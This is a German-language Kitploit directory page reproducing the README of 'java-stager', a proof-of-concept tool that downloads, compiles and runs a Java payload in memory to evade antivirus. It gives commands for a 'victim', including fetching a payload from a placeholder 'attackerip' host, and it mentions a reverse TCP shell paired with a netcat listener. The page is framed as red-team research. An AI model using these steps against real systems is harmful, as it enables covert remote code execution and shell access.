Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
java-stager — Ein PoC Java Stager, der eine Java-Datei im Speicher herunterladen, kompilieren und ausführen kann. | Kitploit
Tools/GitHubGitHub/cornerpirate/java-stager
SpeicherforensikPayload-GenerierungDynamische Code-Analyse (DAST)ExploitationPost-ExploitationCommand and ControlLernen & BildungRed TeamingRemote-Access-ToolPayload-Entwicklung
GitHubcornerpirate/java-stager

java-stager

107306vor 8 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Ein PoC Java Stager, der eine Java-Datei im Speicher herunterladen, kompilieren und ausführen kann.

Repository anzeigen

java-stager

Ein PoC Java-Stager, der eine Java-Datei herunterladen, kompilieren und im Speicher ausführen kann.

Dies dient nur zu Forschungszwecken, verwenden Sie es nicht an Orten, an denen Sie nicht autorisiert sind.

Was ist das?

Dies basiert auf der Arbeit von James Williams aus seinem Vortrag "Next Gen AV vs My Shitty Code", verfügbar hier:

https://www.youtube.com/watch?v=247m2dwLlO4&feature=youtu.be

Die wichtigsten Teile des Vortrags für mich sind:

  • Einen Stager auf das Opfer laden (berührt die Festplatte, ist aber eine gutartige Binärdatei)
  • Der Stager lädt Rohcode über HTTP herunter (der im Speicher bleibt)
  • Der Stager kompiliert Rohcode (ebenfalls im Speicher)
  • Der Stager führt dann kompilierten Code aus (ebenfalls im Speicher)

Sein Beispiel ist in .NET, aber im Vortrag schlug er vor, dass Java in der Lage wäre, die gleichen Techniken anzuwenden. Ich habe einen rudimentären PoC implementiert, der meiner Meinung nach den obigen Techniken entspricht.

Arbeiten damit

  • Klonen Sie das gesamte Repository.
  • Öffnen Sie es in einer IDE, die Maven verwenden kann (z. B. NetBeans).
  • Der Stager und das Beispiel-Payload befinden sich im Ordner "/src/main/java".
  • Ändern Sie den Stager nach Belieben und kompilieren Sie das Projekt. Ich habe "clean/build" im Standardprofil verwendet.

Die Ausgabe in NetBeans enthielt eine Zeile wie diese:

Building jar: C:\Users\cornerpirate\Documents\NetBeansProjects\java-stager\target\JavaStager-0.1-initial.jar

Um auf Ihrem Opfer zu arbeiten, müssen Sie die Datei "JavaStager*.jar" und den Ordner "lib" mit Janino aus dem Ordner "target" hochladen.

Der folgende Befehl führt den Stager aus:

java -jar JavaStager-0.1-initial.jar

Sie werden mit der Verwendung wie gezeigt aufgefordert:

Proper Usage is: java -jar JavaStager-0.1-initial.jar <url>

Die "url" ist der einzige Parameter, der an den Stager übergeben wird. Ein Beispiel für die Verwendung wäre:

java -jar JavaStager-0.1-initial.jar http://attackerip/Payload.java

Ihr Payload muss in einer Datei namens "Payload.java" enthalten sein, und Ihr Exploit-Code muss sich in einer statischen Methode namens "Run" befinden. Das Folgende zeigt die Vorlage, wenn Sie Ihre eigene schreiben möchten:

root@kitploit:~
public class Payload {
   public static void Run() {
      // Your code here
   }
}

Ich habe ein Beispiel für ein Reverse-TCP-Payload in der Datei "TCPReverseShell.java" bereitgestellt. Um Namenskonflikte zu vermeiden, heißt diese nicht "Payload.java" und der Klassenname ist falsch. Der Kopfkommentar in "TCPReverseShell.java" erklärt, wie man sie modifiziert, damit sie funktioniert.

Sie müssen Ihre Datei "Payload.java" auf einem HTTP-Server hosten. Sie können Apache verwenden, wenn Sie möchten, oder einfache HTTP/HTTPS-Dienste in Python2 und Python3, wie in meinem Blog beschrieben:

https://cornerpirate.com/2016/12/16/simple-http-or-https-servers/

Der Angreifer muss einen netcat-Listener starten, um die Rückverbindung mit der standardmäßigen nc -lvp 8044-Technik abzufangen.

Weitere Informationen

Blogbeitrag, der erklärt, wie alles funktioniert:

https://cornerpirate.com/2018/08/06/java-stager-hide-from-av-in-memory/

Video, das zeigt, wie es in der Praxis funktioniert:

https://www.youtube.com/watch?v=-KkJVdSHPAc

Tool herunterladen